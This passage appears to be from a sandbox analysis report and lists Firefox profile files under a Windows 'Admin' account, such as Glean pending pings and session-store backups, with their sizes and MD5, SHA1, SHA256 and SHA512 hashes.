SHA2567dd69f999ca90dd5cd7f564e4166bb8345aefa7b7aa90501c15608c5f62572ba
SHA512856e0a59913bbaf21d23374f3124effbd4f039a53f9c5169c374eb49af8acee518a98ad0cde54e8defb42899eb2310ff849f8627a735f7b06d3d5c26ef69c100
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\pending_pings\3f138502-aac0-43c2-bba6-3cc55caf53a9
Filesize745B
MD5018d2e88172e8b7b911ff3e6c3d183d6
SHA16e84d5041c1c731d5060fec2e0a031e9994480ce
SHA256a34b888e67df3a1b3dc9fcb9eb4755286e45fab41cd3353ef43762578e8dee19
SHA512e9616a261c1e9928d552c88c46b2b0bf968bf41739b76271073cc3a409d36426f0ef6748e5c7ec58069950942ed03a66a53e935086fc9c4e18d7c238e8682cc9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\pending_pings\c41af5ad-9558-4a8c-ad67-1524f05cf603
Filesize13KB
MD5f63cd2622ef38fda2940082b1505d0cd
SHA1a9d74fdbed087595ca43c4b0fc263daec6b7ccd6
SHA2561d087139c96179709c96a2f35ef2a4ddb8c5dd18f002b3df07bd757716efa433
SHA51228f24cafca8ed2e9a26363a931170a04878663b21826ea0167a4a7c9e71a49cd41aeb86826d417978c0cbad0d67f13fb7635949349be045777f25ab8799c26df
-
Filesize
6KB
MD58a87ba360c03a75b415ab72f32114e37
SHA119371680af9e01982ec74dc0bf5cdaed31e00bba
SHA2560cdd9b8b16e7bbae5f195e2caea57854833d3bb7171aa3d063b73f82f62ae18e
SHA512560719d1a5a149ff2e38b1b78784fc4bfccb7bf431712fe0abdd8891351a46f48db4bdb08b1e8fedda0629df58b3b27eaa5f7b3aba7f1b67109358d6bf04ae1c
-
Filesize
6KB
MD592b8b012c943815697c8b4f2c484387a
SHA14ca9cb7eccfab718973ed7e7c2ece4f217a51a31
SHA2565bcec8268c4164b6a71c80859b7e35952a8c2d37d2f8f03fe1330f4e1128bbde
SHA512e707f69ff65e009b7a7bdbb44efc49919aab6a6004e912b7a74376150c2876b575bd34175f8e4fda1cb4add6ea1fdb9449143927af9bcd2b21745ab9b665fca8
-
Filesize
6KB
MD5a2b6dd0977449c1683eb4a1ce7c9e605
SHA1a9b490511b62b2f028d8bad946a18e9eff4d5ead
SHA256c25aa9f17d2f788fb163ce27790d470d916a4e7e562dd7a25eddbf8fe3cba381
SHA512d2f26ce0d17f1cdc9eebab381b5908a535ce25a3fa108d724027b2f02484da3d04dd22fdfd0cdd753d54dc1a766ca8865fdea87f75a81c3ae3954d243c44aba9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5d0fc8e5aa43b6186ce2e3cde09e213b1
SHA17571982e0de6cd9d29f4fa87b184fafaf6949292
SHA2565062c58034175ef81947713ef190e4b159ddb39a688d5952e7702481460817e5
SHA51292116169e0b92e73a23b015b13c8b5fa86d6b78ed8700d7166ba0f6508371998a88d3c9ec9edf6219f35c0929922841a86fbf5c19226f14e0e1ae74464bdb3f9
-
Filesize
1.0MB
MD5c63860691927d62432750013b5a20f5f
SHA103678170aadf6bab2ac2b742f5ea2fd1b11feca3
SHA25669d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353
SHA5123357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de
-
Filesize
1.8MB
MD5d5f6e39b19e5b45d9953d4cb1401cc51
SHA1c20f5112e5c6743247c3aa2939bbac098e7df551
SHA256bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666
SHA512b63a89ec0df2dd5c836e03d5c4f2b74acd5444499ac728eb66d9cc55d892b85819ceb10c98bb96067170fa4d0ac34cc72c3f839e8f4c1c740d7e50d27e6fb298